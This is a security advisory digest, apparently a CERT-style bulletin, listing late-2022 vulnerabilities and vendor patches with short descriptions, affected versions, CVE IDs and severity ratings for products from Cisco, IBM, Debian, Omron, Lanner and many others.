CVE ID: CVE-2022-34326 (High)
An arbitrary command execution vulnerability due to OpenSSL vulnerability has been
discovered in GT SoftGOT2000. An attacker could execute malicious OS commands by sending a
specially crafted certificate.
CVE ID: CVE-2022-2068 (Critical)
The missing authentication for critical function and path traversal vulnerabilities have
been discovered in Hitachi Kokusai Network products for monitoring systems (Camera, Encoder,
Decoder). The affected products are camera HC, KV, KP series, encoders VG, PT series and
decoders PT series. Security updates are available.
CVE ID: CVE-2022-37680(High) , CVE-2022-37681 (High)
A ClassLoader manipulation vulnerability has been discovered in TERASOLUNA Global Framework
and TERASOLUNA Server Framework for Java (Rich) which is contained in Spring Framework. NTT
DATA Corporation has released security updates to resolve the vulnerability.
CVE ID: CVE-2022-43484
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
An insufficient access control vulnerability has been discovered in the web-based management
interface of Cisco Identity Services Engine (ISE).
CVE ID: CVE-2022-20956 (High)
A Cross-Site Scripting (XSS) vulnerability has been discovered in the External RESTful
Services (ERS) API of Cisco Identity Services Engine (ISE) software. Security updates are
available.
CVE ID: CVE-2022-20959
Debian has released a security update to address a buffer overflow vulnerability in the
xorg-server package, which can result in Denial of Service (DoS) or potentially the
execution of arbitrary code.
CVE ID: CVE-2022-3550 (High) , CVE-2022-3551 (High)
Debian has released security updates to address buffer overflow vulnerability in the php7.4
package, which can result in Denial of Service (DoS) , information disclosure, insecure
cooking handling or potentially the execution of arbitrary code.
CVE ID: CVE-2022-31630, CVE-2022-37454 (Critical) , CVE-2022-31629 (Medium),
CVE-2022-31628 (Medium)
Pulse Secure has released security updates to resolve multiple vulnerabilities in its
products. The affected products are Ivanti Connect Secure (ICS) in versions prior to
9.1R14.3, 9.1R15.2, 9.1R16.2, and 22.2R4, Ivanti Policy Secure (IPS) in versions prior to
9.1R17 and 22.3R1, and Ivanti Neurons for Zero-Trust Gateway in versions prior to 22.3R1.
CVE ID: CVE-2022-35254,CVE-2022-35258 (High)
Debian has released a security update to address a heap-based buffer overflow vulnerability
in the pixman package, which can result in Denial of Service (DoS) or potentially the
execution of arbitrary code.
CVE ID: CVE-2022-44638 (High)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates are
available.
MOXA has released security updates to address multiple vulnerabilities in its equipment-
VPort Series. Successful exploitation of the improper input validation control can allow a
remote attacker to cause the RTSP service to crash.
CVE ID: CVE-2022-38157, CVE-2022-38158, CVE-2022-38159
Ubuntu has released security updates to address several vulnerabilities in WavPack, and
Firefox. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-2476 (Medium), CVE-2022-42927 (High), CVE-2022-42928 (High),
CVE-2022-42929 (Medium), CVE-2022-42930 (Medium), CVE-2022-42932 (Medium)
Dell has released security updates for Dell Secure Connect Gateway (SCG) Policy Manager,
Dell Secure Connect Gateway, and Dell Client to address multiple vulnerabilities that can be
exploited by malicious users to compromise the affected system.
CVE ID: CVE-2022-34440 (High), CVE-2022-34441 (High), CVE-2022-34442 (High),
CVE-2022-34462 (High), CVE-2022-28667, CVE-2022-26047
Active Debug Code vulnerability has been discovered in Omron's Equipment- NJ/NX-series
Machine Automation Controllers. Successful exploitation of this vulnerability can allow an
attacker to obtain unauthorized access to the device and cause the device to be in an “out
of service” state or execute a malicious program on the device.
CVE ID: CVE-2022-33971 (High)
Multiple vulnerabilities such as Hard-coded Credentials, and Authentication Bypass by
Capture-replay have been discovered in Omron's Equipment- NJ/NX-series Controllers and
Software. Successful exploitation of these vulnerabilities can allow an attacker to bypass
authentication in the communications connection process to login and operate the controller
products without authorization.
CVE ID: CVE-2022-34151 (Critical), CVE-2022-33208 (High)
Google has released Dev channel 109.0.5410.0 for Windows, Mac and Linux, Stable channel
107.0.5304.110 (Platform version: 15117.111.0/15117.112.0) for most ChromeOS devices, Chrome
Beta 108 (108.0.5359.40) for iOS, and Chrome Dev 109 (109.0.5409.0) for Android.
An information exposure vulnerability has been discovered in the Zoom Client for Meetings
for Android, iOS, Linux, macOS, and Windows.
CVE ID: CVE-2022-28764 (Low)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
It has been discovered that the file upload function of Agentflow BPM has insufficient
filtering for special characters in URLs. An unauthenticated remote attacker can exploit
this vulnerability to upload arbitrary file and execute arbitrary code to manipulate system
or disrupt service.
CVE ID: CVE-2022-39036 (Critical)
An insufficient authentication vulnerability has been discovered in UPSMON Pro login
function. An unauthenticated remote attacker can exploit this vulnerability to bypass
authentication and get administrator privilege to access, control system or disrupt service.
CVE ID: CVE-2022-38119 (Critical)
Parse Server has released security update to address a Remote Code Execution vulnerability
via prototype pollution in its products. The affected versions are Parse Server prior to
4.10.18, and prior to 5.3.1 on the 5.X branch.
CVE ID: CVE-2022-39396 (Critical)
It has been discovered that lack of sand-boxing of OpenAPI documents in GitLab CE/EE allows
an attacker to trick a user to click on the Swagger OpenAPI viewer and issue HTTP requests
that affect the victim's account. The affected versions are all versions of GitLab CE/EE
from 12.6 prior to 15.3.5, 15.4 prior to 15.4.4, and 15.5 prior to 15.5.2.
CVE ID: CVE-2022-3726 (Critical)
Debian has released security updates to address multiple vulnerabilities in exiv2, and
xorg-server. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2017-11683 (Medium), CVE-2020-19716 (Medium), CVE-2022-3756 (High),
CVE-2022-3550 (Critical), CVE-2022-3551 (High)
An information disclosure vulnerability has been discovered in AIPHONE's Video Multi-Tenant
System Entrance Stations. The affected products are GT-DMB-N with firmware versions prior to
3.00, GT-DMB with firmware versions prior to 3.00, GT-DMB-LVN with firmware versions prior
to 3.00 and GT-DB-VN with firmware versions prior to 2.00.
CVE ID: CVE-2022-40903 (Medium)
Android has released a security bulletin to resolve multiple vulnerabilities affecting
several Android devices. Security patch levels of 2022-11-05 or later, address all of these
issues.
A Remote Code Execution (RCE) vulnerability has been discovered in Roxy Fileman. The
affected version is Roxy Fileman 1.4.6.
CVE ID: CVE-2022-40797 (Critical)
A privilege escalation vulnerability has been discovered in Symantec Endpoint Detection and
Response (SEDR) Appliance. The affected versions are Symantec Endpoint Detection and
Response Appliance prior to 4.7.0.
CVE ID: CVE-2022-37015 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Apple has released security updates to resolve multiple vulnerabilities in macOS Ventura
13.0.1, iOS 16.1.1, and iPadOS 16.1.1. An attacker can exploit these vulnerabilities to take
control of an affected system.
CVE ID: CVE-2022-40303, CVE-2022-40304
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Google has released Chrome Beta 108 (108.0.5359.38) for Android, Beta channel 108.0.5359.40
for Windows, Mac and Linux, and Extended Stable 106.0.5249.181 for Windows and Mac.
An uncontrolled search path element vulnerability has been discovered in EXPRESSCLUSTER X,
and CLUSTERPRO X. The affected versions are CLUSTERPRO X 5.0 for Windows and earlier,
EXPRESSCLUSTER X 5.0 for Windows and earlier, CLUSTERPRO X 5.0 SingleServerSafe for Windows
and earlier, EXPRESSCLUSTER X 5.0 SingleServerSafe for Windows and earlier.
CVE ID: CVE-2022-34825 (Critical)
A weak file and folder permissions vulnerability has been discovered in EXPRESSCLUSTER X,
and CLUSTERPRO X. The affected versions are CLUSTERPRO X 5.0 for Windows and earlier,
EXPRESSCLUSTER X 5.0 for Windows and earlier, CLUSTERPRO X 5.0 SingleServerSafe for Windows
and earlier, EXPRESSCLUSTER X 5.0 SingleServerSafe for Windows and earlier.
CVE ID: CVE-2022-34824 (Critical)
A buffer overflow vulnerability has been discovered in EXPRESSCLUSTER X, and CLUSTERPRO X.
The affected versions are CLUSTERPRO X 5.0 for Windows and earlier, EXPRESSCLUSTER X 5.0 for
Windows and earlier, CLUSTERPRO X 5.0 SingleServerSafe for Windows and earlier,
EXPRESSCLUSTER X 5.0 SingleServerSafe for Windows and earlier.
CVE ID: CVE-2022-34823 (Critical)
A path traversal vulnerability has been discovered in EXPRESSCLUSTER X, and CLUSTERPRO X.
The affected versions are CLUSTERPRO X 5.0 for Windows and earlier, EXPRESSCLUSTER X 5.0 for
Windows and earlier, CLUSTERPRO X 5.0 SingleServerSafe for Windows and earlier,
EXPRESSCLUSTER X 5.0 SingleServerSafe for Windows and earlier.
CVE ID: CVE-2022-34822 (Critical)
A CSV injection vulnerability has been discovered in Activity Log Team Activity Log for
WordPress. The affected versions are Activity Log Team Activity Log 2.8.3 and below for
WordPress.
CVE ID: CVE-2022-27858 (Critical)
A vulnerability has been discovered in QMS Automotive that allows attackers to gain access
to credentials and impersonate other users. The affected products are all versions of QMS
Automotive.
CVE ID: CVE-2022-43958 (Critical)
An authorization bypass vulnerability has been discovered in OpenFGA. The affected versions
are OpenFGA prior to 0.2.5.
CVE ID: CVE-2022-39352 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Netwrix Auditor User
Activity Video Recording component that affects both the Netwrix Auditor server and agents
installed on monitored systems.
CVE ID: CVE-2022-31199 (Critical)
A SQL injection vulnerability has been discovered in WooCommerce Dropshipping WordPress
plugin. The affected versions are WooCommerce Dropshipping WordPress plugin prior to 4.4.
CVE ID: CVE-2022-3481 (Critical)
Microsoft has released security updates to address multiple vulnerabilities in its products.
An attacker can exploit these vulnerabilities to take control of an affected system.
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Citrix has released security update to address multiple vulnerabilities in Citrix Gateway
and Citrix ADC.
CVE ID: CVE-2022-27510, CVE-2022-27513, CVE-2022-27516
Dell has released security updates for Dell EMC VxRail Appliance, and Dell PowerEdge Server
to address multiple vulnerabilities that can be exploited by malicious users to compromise
the affected system.
CVE ID: CVE-2022-23816 (Medium), CVE-2022-23825 (Medium), CVE-2022-26373 (Medium),
CVE-2022-28693 (Medium), CVE-2022-29901 (Medium), CVE-2022-29466, CVE-2022-29515 (Medium),
CVE-2022-21198 (High)
Intel has released security updates to address multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Google has released Dev channel 109.0.5399.0 (Platform version: 15231.0.0) for most ChromeOS
devices, Chrome 107 (107.0.5304.105) for Android, Chrome Stable 107 (107.0.5304.101) for
iOS, and Stable channel 107.0.5304.110 for Mac and Linux and 107.0.5304.106/.107 for Windows
to resolve multiple vulnerabilities.
CVE ID: CVE-2022-3885 (High), CVE-2022-3886 (High), CVE-2022-3887 (High),
CVE-2022-3888 (High), CVE-2022-3889 (High), CVE-2022-3890 (High)
GitLab has released Community Edition and Enterprise Edition version 15.5.3 to resolve a
number of regressions and bugs in 15.5 release and prior versions.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Joomla has released security update to resolve a Reflected XSS vulnerability in Joomla CMS
com_media. The affected versions are Joomla CMS versions 4.0.0 to 4.2.4.
CVE ID: CVE-2022-27914 (Low)
Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates are
available.
CVE ID: CVE-2022-1552 (High), CVE-2022-36033 (Medium), CVE-2022-38533 (Medium),
CVE-2022-38791 (Medium), CVE-2022-39046 (Medium)
VMware has released a security updates to address multiple vulnerabilities in VMware
Workspace ONE Assist.
CVE ID: CVE-2022-31685 (Critical), CVE-2022-31686 (Critical), CVE-2022-31687
(Critical), CVE-2022-31688 (Medium), CVE-2022-31689 (Medium)
It has been discovered that d8s-xml for python included a potential code-execution backdoor
inserted by a third party. The affected version is d8s-htm 0.1.0.
CVE ID: CVE-2022-44054 (Critical)
It has been discovered that d8s-xml for python included a potential code-execution backdoor
inserted by a third party. The affected version is d8s-htm 0.1.0.
CVE ID: CVE-2022-44053 (Critical)
Apache has released a security update to address a vulnerability in Apache Ivy that doesn't
verify the target path when extracting the archive. The affected versions are Ivy 2.4.0 to
2.5.0.
CVE ID: CVE-2022-37865 (Critical)
SAP has released security updates to address several vulnerabilities affecting multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-41203 (Critical), CVE-2021-20223 (Critical), CVE-2022-35737
(Critical), CVE-2022-41204 (Critical)
A buffer overflow vulnerability has been discovered in Azure RTOS USBX. The affected
versions are Azure RTOS USBX prior to 6.1.12.
CVE ID: CVE-2022-39344 (Critical)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Use of externally-controlled format string vulnerability has been discovered in GitHub
repository. The affected versions are GitHub repository pingcap/tidb prior to 6.4.0, 6.1.3.
CVE ID: CVE-2022-3023 (Critical)
A SQL injection vulnerability has been discovered in CandidATS that allows to perform CRUD
operations on application databases. The affected version is CandidATS version 3.0.0.
CVE ID: CVE-2022-42744 (Critical)
It has been discovered that IBM InfoSphere Information server 11.7 is vulnerable to an XML
External Entity Injection (XXE) attack when processing XML data that causes exposure of
sensitive information or can consume memory resources.
CVE ID: CVE-2022-40747 (Critical)
It has been discovered that IBM InfoSphere Information Server 11.7 is vulnerable
to CSV injection vulnerability that can cause execution of arbitrary commands on the system.
CVE ID: CVE-2022-22425 (Critical)
A command injection vulnerability has been discovered in D-Link DIR-823G that allows to
execute arbitrary commands via a crafted packet. The affected version is D-Link DIR-823G
v1.0.2.
CVE ID: CVE-2022-43109 (Critical)
A Remote Command Execution (RCE) vulnerability via path traversal has been discovered in
iSpy. The affected version is iSpy v7.2.2.0.
CVE ID: CVE-2022-29774 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-42919, CVE-2022-35737 (High), CVE-2022-40284
Google has released Dev Channel 109.0.5396.2 for Windows, Linux and Mac, Chrome Beta 108
(108.0.5359.30) for iOS, and Chrome Dev 109 (109.0.5394.4) for Android.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Trellix has released security updates to address an XXE Injection vulnerability in Trellix
IPS Manager. The affected versions are Trellix IPS Manager prior to 10.1 Minor release M10.
CVE ID: CVE-2022-3340 (Medium)
Multiple vulnerabilities have been discovered in Nokia's Equipment- ASIK AirScale 5G Common
System Module. Successful exploitation of these vulnerabilities can result in the execution
of a malicious kernel, the running of arbitrary malicious programs, or the running of
modified Nokia programs. The affected versions are Nokia ASIK AirScale: ASIK 474021A.101,
and ASIK 474021A.102 (not affected by CVE-2022-2484).
CVE ID: CVE-2022-2482 (High), CVE-2022-2484 (High), CVE-2022-2483 (High)
Delta Industrial Automation has released a security update to address a path traversal
vulnerability in its equipment- DIALink which can allow an attacker to place malicious code
on the target device. The affected products are DIALink versions prior to v1.5.0.0 Beta 4.
CVE ID: CVE-2022-2969 (High)
Gestionnaire Libre de Parc Informatique (GLPI) has released a security update to address a
SQL injection vulnerability that leads to a time-based attack in api REST user_token in
GLPI.
CVE ID: CVE-2022-39323 (Critical)
An out of bounds vulnerability has been discovered in GBL parser of Silicon Labs Gecko
Bootloader that allows to overwrite flash Sign key and OTA decryption key via malicious
bootloader upgrade. The affected versions are GBL parser in Silicon Labs Gecko Bootloader
4.0.1 and earlier.
CVE ID: CVE-2022-24936 (Critical)
Centreon has released a security update to address a SQL injection vulnerability that
affects component Contact Groups Form.
CVE ID: CVE-2022-3827 (Critical)
ETIC Telecom has released a security update to resolve multiple vulnerabilities in its
equipment Remote Access Server (RAS). Successful exploitation of these vulnerabilities can
allow to obtain sensitive information and compromise the vulnerable device and other
connected machines. The affected versions are all versions of ETIC Telecom RAS 4.5.0 and
prior.
CVE ID: CVE-2022-3703 (Critical), CVE-2022-41607 (High), CVE-2022-40981
(High)
Huawei has released security updates to address a path traversal vulnerability in Huawei
Aslan Children's Watch that can result in accessing or modifying protected system resources.
CVE ID: CVE-2022-44564 (High)
Ubuntu has released security updates to address an incorrect validation vulnerability in
NTFS metadata. The affected products are Ubuntu 22.10, Ubuntu 22.04 LTS, Ubuntu 20.04 LTS,
and Ubuntu 18.04 LTS.
CVE ID: CVE-2022-40284
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-3602 (High), CVE-2022-3786 (High), CVE-2022-20961 (High),
CVE-2022-20956 (High), CVE-2022-20867 (High), CVE-2022-20868 (High), CVE-2022-20951 (High),
CVE-2022-20958 (High), CVE-2022-20969 (Medium), CVE-2022-20963 (Medium), CVE-2022-20937
(Medium), CVE-2022-20962 (Medium), CVE-2022-20960 (Medium), CVE-2022-20942 (Medium),
CVE-2022-20772 (Medium)
Google has released Beta channel 108.0.5359.24 (Platform version: 15183.28.0) for most
ChromeOS devices, Chrome Beta 108 (108.0.5359.28) for Android, and Beta channel
108.0.5359.30 for Mac and Linux and 108.0.5359.29 for Windows.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
It has been discovered that Frauscher Sensortechnik GmbH FDS102 for FAdC R2 and FAdCi R2 are
vulnerable to malicious code upload without authentication by using the configuration upload
function. This can lead to a complete compromise of the FDS102 device. The affected versions
are Frauscher Sensortechnik GmbH FDS102 for FAdC R2 and FAdCi R2 v2.8.0 to v2.9.1.
CVE ID: CVE-2022-3575 (Critical)
It has been discovered that a remote unprivileged attacker can interact with the
configuration interface of a Flexi-Compact FLX3-CPUC1 or FLX3-CPUC2 running an affected
firmware version to potentially impact the availability of the FlexiCompact.
CVE ID: CVE-2022-27583 (Critical)
Improper Neutralization vulnerability has been discovered in OpenNebula core on Linux that
allows Remote Code Inclusion.
CVE ID: CVE-2022-37425 (Critical)
Improper type validation vulnerability has been discovered in Socket.io js library. It is
possible to overwrite the _placeholder object which allows an attacker to place references
to functions at arbitrary places in the resulting query object.
CVE ID: CVE-2022-2421 (Critical)
Apple has released security updates to resolve multiple vulnerabilities in Xcode 14.1
available for macOS Monterey 12.5 and later. An attacker can exploit these vulnerabilities
to take control of an affected system.
CVE ID: CVE-2022-29187, CVE-2022-39253, CVE-2022-39260, CVE-2022-42797
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Citrix has released security update to address multiple vulnerability in Citrix Hypervisor
8.2 LTSR CU1.
CVE ID: CVE-2022-42316, CVE-2022-42317, CVE-2022-42318, CVE-2022-42323
It has been discovered on Octopus server that Disabled/Deleted users API keys are still
usable when access is revoked via an External Auth Provider. The updates are available.
CVE ID: CVE-2022-2572 (High)
OpenSSL released security updates to address multiple buffer overflow vulnerabilities in
OpenSSL that can result in a crash (causing a Denial of Service (DoS). The affected versions
are OpenSSL 3.0.0 through 3.0.6.
CVE ID: CVE-2022-3602 (High), CVE-2022-3786 (High)
It has been discovered that multiple buffer overrun vulnerabilities in OpenSSL affect
Juniper Networks Junos OS Evolved. The affected versions are Juniper Networks Junos OS
Evolved versions later than 22.1R1-EVO.
CVE ID: CVE-2022-3602 (High), CVE-2022-3786 (High)
Google has released LTS channel 102.0.5005.184 (Platform Version: 14695.142.0) for most
ChromeOS devices to resolve multiple vulnerabilities..
CVE ID: CVE-2022-3044(High), CVE-2022-3306 (High), CVE-2022-3305 (High),
CVE-2022-3446 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Debian has released security updates to address a buffer overflow vulnerability in Python.
The affected version is Python 3.7.
CVE ID: CVE-2022-37454 (Critical)
Hitachi has released security updates to address multiple vulnerabilities in Hitachi
Infrastructure Analytics Advisor, Hitachi Ops Center Analyzer and Hitachi Ops Center
Viewpoint.
CVE ID: CVE-2022-41552 (Critical), CVE-2020-36605 (Medium), CVE-2022-41553 (Medium),
CVE-2022-3191 (Medium)
A vulnerability has been discovered in lesspipe that allows attackers to execute code via
Perl Storable (pst) files. The affected versions are lesspipe prior to 2.06.
CVE ID: CVE-2022-44542 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Clinic's Patient
Management System. The affected version is Clinic's Patient Management System v1.0.
CVE ID: CVE-2022-40471 (Critical)
An authorization rules bypass vulnerability has been discovered in VMware Spring Security.
The affected products are Spring Security 5.7.0 to 5.7.4, and Spring Security 5.6.0 to
5.6.8. The mitigations are available.
CVE ID: CVE-2022-31692 (High)
CISA has released guidelines to implement phishing-resistant Multi Factor Authentication
(MFA) to protect against phishing and other known cyber threats.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Microsoft has released Microsoft Edge Stable Channel (Version 107.0.1418.26). This update
contains a fix for CVE-2022-3723, which has an exploit in the wild.
CVE ID: CVE-2022-3723
It has been discovered that Mail SQR Expert specific function has insufficient filtering for
special characters which can cause arbitrary system command execution and can disrupt
service.
CVE ID: CVE-2022-40741 (Critical)
A weak password requirements vulnerability has been discovered in GitHub repository. The
affected versions are GitHub repository thorsten/phpmyfaq prior to 3.1.8.
CVE ID: CVE-2022-3754 (Critical)
A SQL injection vulnerability has been discovered in School Activity Updates with SMS
Notification. The affected version is School Activity Updates with SMS Notification v1.0.
CVE ID: CVE-2022-39976 (Critical)
An improper access control vulnerability has been discovered in Rockwell Automation's
Equipment- FactoryTalk Alarm and Events Server that can result in a Denial of Service (DoS)
condition. All versions of FactoryTalk Alarm and Events Server are affected by this
vulnerability.
CVE ID: CVE-2022-38744 (High)
SAUTER Controls has released security updates to address a Cross Site Scripting (XSS)
vulnerability in its equipment- moduWeb. Successful exploitation can trick users into
clicking on malicious links and steal sensitive information. The affected version is SAUTER
moduWeb firmware Version 2.7.1.
CVE ID: CVE-2022-40190 (High)
Rockwell Automation has released security updates to address multiple vulnerabilities in its
equipment- Stratix Devices. Successful exploitation of these vulnerabilities can lead to a
Denial of Service (DoS) condition and allow Remote Code Execution (RCE). The affected
versions are all versions of Stratix 5800 switches prior to v16.12.01, and all versions of
Stratix 5400/5410 switches prior to v15.2(7)E2.
CVE ID: CVE-2020-3229 (High), CVE-2020-3219 (High), CVE-2021-1446 (High),
CVE-2020-3200 (High), CVE-2020-3211 (High), CVE-2020-3218 (High), CVE-2020-3209 (Medium),
CVE-2021-1385 (Medium), CVE-2020-3516 (Medium)
An improper input validation vulnerability has been discovered in Trihedral's Equipment-
VTScada. Successful exploitation of this vulnerability can cause a Denial of Service (DoS)
condition in the affected product.
CVE ID: CVE-2022-3181 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Dell has released security update to address multiple vulnerabilities affecting Dell Client
BIOS that could be exploited by malicious users to compromise the affected system(s).
CVE ID: CVE-2022-34460, CVE-2022-34393
Multiple vulnerabilities have been discovered in AliveCor's Equipment- KardiaMobile.
Successful exploitation can allow stealing or faking personal cardiograms or enabling a
Denial of Service (DoS) attack.
CVE ID: CVE-2022-40703 (Medium), CVE-2022-41627 (Medium)
Debian has released a security update to address multiple vulnerabilities in thunderbird
package, which can result in denial of service or the execution of arbitrary code.
CVE ID: CVE-2022-42927, CVE-2022-42928, CVE-2022-42929, CVE-2022-42932
Debian has released a security update to address multiple vulnerabilities in Chromium
package, which can result in the execution of arbitrary code, denial of service or
information disclosure.
CVE ID: CVE-2022-3652, CVE-2022-3653, CVE-2022-3654, CVE-2022-3655, CVE-2022-3656,
CVE-2022-3657, CVE-2022-3658, CVE-2022-3659, CVE-2022-3660, CVE-2022-3661
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Cross-Site Scripting (XSS) and SQL injection vulnerabilities have been discovered in Delta
Electronics' equipment - DIAEnergie, that can cause injection of arbitrary code to retrieve
and modify database contents and execute system commands. The affected versions are prior to
v1.9.01.002.
CVE ID: CVE-2022-41701, CVE-2022-40965, CVE-2022-41555, CVE-2022-41702,
CVE-2022-41651, CVE-2022-40967, CVE-2022-41133, CVE-2022-41773
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2020-3433(High), CVE-2020-3153 (Medium)
It has been discovered that OpenFGA versions prior to 0.2.4 are vulnerable to the
authorization bypass vulnerability. Security update is available.
CVE ID: CVE-2022-39342 (Critical)
A directory traversal vulnerability has been discovered in the web_server /ajax/remove/
functionality of Robustel R1510 version 3.1.16. A specially-crafted network request can lead
to arbitrary file deletion.
CVE ID: CVE-2022-33897 (Critical)
An OS command injection vulnerability has been discovered in the console_main_loop :sys
functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z. A specially-crafted
XCMD can lead to arbitrary command execution.
CVE ID: CVE-2022-29520 (Critical)
Multiple vulnerabilities have been discovered in Delta Electronics' equipment - InfraSuite
Device Master that can cause Remote Code Execution (RCE) & Denial of Service (DoS)
condition. The affected versions are 00.00.01a and prior.
CVE ID: CVE-2022-41778, CVE-2022-38142, CVE-2022-41779, CVE-2022-41657,
CVE-2022-41772, CVE-2022-40202, CVE-2022-41688, CVE-2022-41644, CVE-2022-41776,
CVE-2022-41629
A Cross-Site Scripting (XSS) vulnerability has been discovered in CKS' equipment- CEVAS
versions prior to 1.01.46 that allow a user to bypass authentication and retrieve data with
specially crafted SQL queries.
CVE ID: CVE-2021-36206
Multiple vulnerabilities have been discovered in Haas Automation' equipment - Haas
Controller version 100.20.000.1110 that can cause Denial-of-Service (DoS) and Remote Code
Execution (RCE).
CVE ID: CVE-2022-2474, CVE-2022-2475, CVE-2022-41636
VMware has released a security update for Cloud Foundation to address a Remote Code
Execution (RCE) vulnerability and an XML External Entity (XXE) vulnerability. The updates
are available.
CVE ID: CVE-2021-39144, CVE-2022-31678
Dell has released security update for PowerStore Family to address multiple vulnerabilities
that can be exploited by malicious users to compromise the affected system.
CVE ID: CVE-2022-24903, CVE-2022-1586, CVE-2021-3580
A URL parsing vulnerability has been discovered in the Zoom Client for Meetings for Android,
iOS, Linux, macOS, and Windows.
CVE ID: CVE-2022-28763 (High)
An arbitrary file upload vulnerability has been discovered on
github.com/flipped-aurora/gin-vue-admin versions prior to 2.5.4 caused by path traversal.
This issue is patched in 2.5.4b. There are no known workarounds.
CVE ID: CVE-2022-39305 (Critical)
Session fixation and insufficient session expiration vulnerabilities have been discovered in
Lanner Inc IAC-AST2500A standard firmware version 1.10.0. This vulnerabilities allow an
attacker to perform session hijacking attacks against users.
CVE ID: CVE-2021-46279 (Critical)
Command injection and multiple stack-based buffer overflows vulnerabilities have been
discovered in Lanner Inc IAC-AST2500A standard firmware version 1.10.0. This vulnerabilities
allow an attacker to execute arbitrary code with the same privileges as the server user
(root).
CVE ID: CVE-2021-26731(Critical)
A stack-based buffer overflow vulnerability has been discovered in Lanner Inc IAC-AST2500A
standard firmware version 1.10.0. This vulnerability allows an attacker to execute arbitrary
code with the same privileges as the server user (root).
CVE ID: CVE-2021-26730(Critical)
An Authentication bypass vulnerability has been discovered in Dell PowerStore versions
2.1.0.x. A remote unauthenticated attacker could potentially exploit this vulnerability
under specific configuration.
CVE ID: CVE-2022-26870 (Critical)
A vulnerability has been discovered in Exim. This issue affects the function
dmarc_dns_lookup of the file dmarc.c of the component DMARC Handler. A patch has been issued
to fix this vulnerability.
CVE ID: CVE-2022-3620
Missing Authentication for Critical Function vulnerability has been discovered in GitHub
repository ikus060/rdiffweb prior to 2.5.0a6.
CVE ID: CVE-2022-3327(Critical)
A sandbox bypass vulnerability has been discovered in Jenkins Pipeline: Deprecated Groovy
Libraries Plugin 583.vf3b_454e43966 and earlier. This vulnerability allows attackers to
bypass the sandbox protection and execute arbitrary code in the context of the Jenkins
controller JVM.
CVE ID: CVE-2022-43406 (Critical)
An authentication bypass vulnerability has been discovered in the device password generation
functionality of Swift Sensors Gateway SG3-1010. A specially-crafted network request can
lead to Remote Code Execution (RCE). An attacker can send a sequence of requests to trigger
this vulnerability.
CVE ID: CVE-2021-40422 (Critical)
Apache has released a security update to resolve CRLF log injection vulnerability in its
Heron version
<= 0.20.4-incubating. CVE ID: CVE-2021-42010 (Low)
The cybercrime group "Daixin Team" is predominantly targeting the Healthcare and Public
Health (HPH) Sector with ransomware and data extortion operations.
An authentication bypass vulnerability has been discovered in Siveillance Video Mobile
Server V2022 R2 (All versions
< V22.2a (80)). This vulnerability can allow an unauthenticated remote attacker to access
the application without a valid account. CVE ID: CVE-2022-43400 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in OpenCATS via the
getDataGridPager's ajax functionality. The affected version is OpenCATS v0.9.6.
CVE ID: CVE-2022-43019 (Critical)
Bentley Systems has released a security update to address stack-based buffer overflow, and
out-of-bounds read vulnerabilities in Bentley Systems' Equipment- MicroStation Connect which
can crash the device being accessed or allow remote arbitrary code execution. The affected
products are Bentley Systems MicroStation Connect v10.17.0.209 and prior.
CVE ID: CVE-2022-40201 (High), CVE-2022-41613 (High)
B. Braun Melsungen AG has released security updates to address multiple vulnerabilities in
B. Braun Melsungen AG's Equipment- SpaceCom, Battery Pack SP with Wi-Fi, and Data module
compactplus. The affected products are SpaceCom, software versions U61 and earlier & L81 and
earlier , Battery pack with Wi-Fi, software versions U61 and earlier & L81 and earlier
and Data module compactplus, software versions A10 and A11.
CVE ID: CVE-2020-25158 (High), CVE-2020-25154 (Medium), CVE-2020-25162 (High),
CVE-2020-25152 (Medium), CVE-2020-25164 (Medium), CVE-2020-25150 (High), CVE-2020-25166
